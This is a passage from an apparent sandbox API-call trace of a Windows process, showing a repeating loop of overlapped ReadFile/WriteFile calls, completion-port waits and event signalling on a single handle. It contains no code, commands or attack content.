lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0084.399] SetEvent (hEvent=0x2bc) returned 1 [0084.399] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0084.399] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0084.400] SetEvent (hEvent=0x25c) returned 1 [0084.400] GetCurrentThreadId () returned 0x5b0 [0084.400] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0084.400] GetLastError () returned 0x3e5 [0084.400] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0084.632] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0084.632] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0084.632] GetCurrentThreadId () returned 0x5b0 [0084.632] SetEvent (hEvent=0x244) returned 1 [0084.632] GetCurrentThreadId () returned 0x5b0 [0084.632] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0084.632] GetLastError () returned 0x3e5 [0084.632] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0084.634] GetCurrentThreadId () returned 0x5b0 [0084.634] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0084.634] SetEvent (hEvent=0x2bc) returned 1 [0084.634] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0084.634] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0084.635] SetEvent (hEvent=0x25c) returned 1 [0084.635] GetCurrentThreadId () returned 0x5b0 [0084.635] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0084.635] GetLastError () returned 0x3e5 [0084.635] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0084.867] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0084.867] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0084.867] GetCurrentThreadId () returned 0x5b0 [0084.867] SetEvent (hEvent=0x244) returned 1 [0084.867] GetCurrentThreadId () returned 0x5b0 [0084.867] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0084.867] GetLastError () returned 0x3e5 [0084.867] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0084.868] GetCurrentThreadId () returned 0x5b0 [0084.868] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0084.868] SetEvent (hEvent=0x2bc) returned 1 [0084.868] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0084.868] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0084.869] SetEvent (hEvent=0x25c) returned 1 [0084.869] GetCurrentThreadId () returned 0x5b0 [0084.869] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0084.869] GetLastError () returned 0x3e5 [0084.869] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0085.101] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0085.101] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0085.101] GetCurrentThreadId () returned 0x5b0 [0085.101] SetEvent (hEvent=0x244) returned 1 [0085.101] GetCurrentThreadId () returned 0x5b0 [0085.101] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0085.101] GetLastError () returned 0x3e5 [0085.101] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0085.102] GetCurrentThreadId () returned 0x5b0 [0085.102] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0085.102] SetEvent (hEvent=0x2bc) returned 1 [0085.102] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0085.102] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0085.103] SetEvent (hEvent=0x25c) returned 1 [0085.103] GetCurrentThreadId () returned 0x5b0 [0085.103] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0085.104] GetLastError () returned 0x3e5 [0085.104] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0085.337] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0085.337] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0085.337] GetCurrentThreadId () returned 0x5b0 [0085.337] SetEvent (hEvent=0x244) returned 1 [0085.337] GetCurrentThreadId () returned 0x5b0 [0085.337] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0085.337] GetLastError () returned 0x3e5 [0085.337] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0085.338] GetCurrentThreadId () returned 0x5b0 [0085.338] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0085.338] SetEvent (hEvent=0x2bc) returned 1 [0085.338] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0085.338] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0085.339] SetEvent (hEvent=0x25c) returned 1 [0085.339] GetCurrentThreadId () returned 0x5b0 [0085.339] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0085.339] GetLastError () returned 0x3e5 [0085.339] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0085.571] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0085.571] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0085.571] GetCurrentThreadId () returned 0x5b0 [0085.571] SetEvent (hEvent=0x244) returned 1 [0085.571] GetCurrentThreadId () returned 0x5b0 [0085.571] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0085.571] GetLastError () returned 0x3e5 [0085.571] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0085.572] GetCurrentThreadId () returned 0x5b0 [0085.572] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0085.572] SetEvent (hEvent=0x2bc) returned 1 [0085.572] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0085.572] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0085.573] SetEvent (hEvent=0x25c) returned 1 [0085.573] GetCurrentThreadId () returned 0x5b0 [0085.573] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0085.573] GetLastError () returned 0x3e5 [0085.573] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0085.805] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0085.805] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0085.805] GetCurrentThreadId () returned 0x5b0 [0085.805] SetEvent (hEvent=0x244) returned 1 [0085.805] GetCurrentThreadId () returned 0x5b0 [0085.805] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0085.806] GetLastError () returned 0x3e5 [0085.806] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0085.806] GetCurrentThreadId () returned 0x5b0 [0085.806] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0085.806] SetEvent (hEvent=0x2bc) returned 1 [0085.806] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0085.807] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0085.807] SetEvent (hEvent=0x25c) returned 1 [0085.808] GetCurrentThreadId () returned 0x5b0 [0085.808] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0085.808] GetLastError () returned 0x3e5 [0085.808] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.040] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0086.040] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.040] GetCurrentThreadId () returned 0x5b0 [0086.040] SetEvent (hEvent=0x244) returned 1 [0086.040] GetCurrentThreadId () returned 0x5b0 [0086.040] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0086.040] GetLastError () returned 0x3e5 [0086.040] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.040] GetCurrentThreadId () returned 0x5b0 [0086.041] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0086.041] SetEvent (hEvent=0x2bc) returned 1 [0086.041] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.041] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.042] SetEvent (hEvent=0x25c) returned 1 [0086.042] GetCurrentThreadId () returned 0x5b0 [0086.042] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0086.042] GetLastError () returned 0x3e5 [0086.042] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.274] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0086.274] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.274] GetCurrentThreadId () returned 0x5b0 [0086.274] SetEvent (hEvent=0x244) returned 1 [0086.274] GetCurrentThreadId () returned 0x5b0 [0086.274] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0086.274] GetLastError () returned 0x3e5 [0086.274] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.275] GetCurrentThreadId () returned 0x5b0 [0086.275] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0086.275] SetEvent (hEvent=0x2bc) returned 1 [0086.275] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.275] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.276] SetEvent (hEvent=0x25c) returned 1 [0086.276] GetCurrentThreadId () returned 0x5b0 [0086.276] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0086.276] GetLastError () returned 0x3e5 [0086.276] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.508] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0086.508] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.508] GetCurrentThreadId () returned 0x5b0 [0086.508] SetEvent (hEvent=0x244) returned 1 [0086.508] GetCurrentThreadId () returned 0x5b0 [0086.508] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0086.508] GetLastError () returned 0x3e5 [0086.508] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.509] GetCurrentThreadId () returned 0x5b0 [0086.509] WriteFile (in: hFile=0x268, lpBuffer=0x2620d18, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710 | out: lpBuffer=0x2620d18, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2639710) returned 1 [0086.509] SetEvent (hEvent=0x2bc) returned 1 [0086.509] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.509] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0086.510] SetEvent (hEvent=0x25c) returned 1 [0086.510] GetCurrentThreadId () returned 0x5b0 [0086.510] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 0 [0086.510] GetLastError () returned 0x3e5 [0086.510] GetQueuedCompletionStatus (in: CompletionPort=0x278, 